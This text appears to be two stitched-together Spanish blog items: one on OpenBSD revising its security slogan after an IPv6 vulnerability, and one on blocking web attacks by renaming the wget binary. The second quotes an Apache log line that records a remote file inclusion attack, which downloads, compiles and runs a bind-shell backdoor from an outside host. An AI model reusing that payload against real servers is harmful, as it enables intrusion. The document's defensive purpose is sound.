Para quien no conozca la historia, OpenBSD es un sistema operativo libre basado en BSD, es conocido en el mundillo como el sistema operativo más seguro y estable que existe, ya que en la instalación por defecto incorpora todas las medidas de seguridad existentes y los servicios que abre al exterior son muy reducidos. De ahí el slogan anteriormente comentado.

Pero recientemente se ha descubierto una nueva vulneabilidad en la pila IPv6, con lo que el slogan ha tenido que ser cambiado a “Sólo 2 fallos de seguridad remotos en más de 10 años”.

Ahún así, este SO sigue siendo el más seguro y estable que podemos encontrar actualmente.

Más información en Hispasec

XXX.XXX.XXX.XXX – - [10/Jan/2005:23:09:31 -0600] “GET index.php?template=http://geocities.com/s3xmelayu/bc-x.gif?&cmd=cd%20/tmp;
wget%20http://geocities.com/s3xmelayu/bindtty.c;gcc%20-o%20webphp%20bindtty.c;
chmod%20+777%20webphp;rm%20-rf%20bindtty.c;./webphp HTTP/1.1″ 200 4308 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)”

Si usas mod_security para apache la mayoría de estos ataques se quedan en meros intentos, pero no dejan de ser molestos.

Mi compañero CrK01, de NewLight Systems, encontró por fin una solución tan simple como efectiva, basta con renombrar en nuestro sistema el binario “wget” a “baja” y el 80% de estos ataques fracasarán.

DISCLAIMER: Al cambiar el nombre de wget, todos los programas o scripts que hagan uso de éste dejarán de funcionar. No me hago responsable de los posibles fallos que este cambio pueda ocasionar. A mi compañero le funciona sin problemas pero cada sistema es un mundo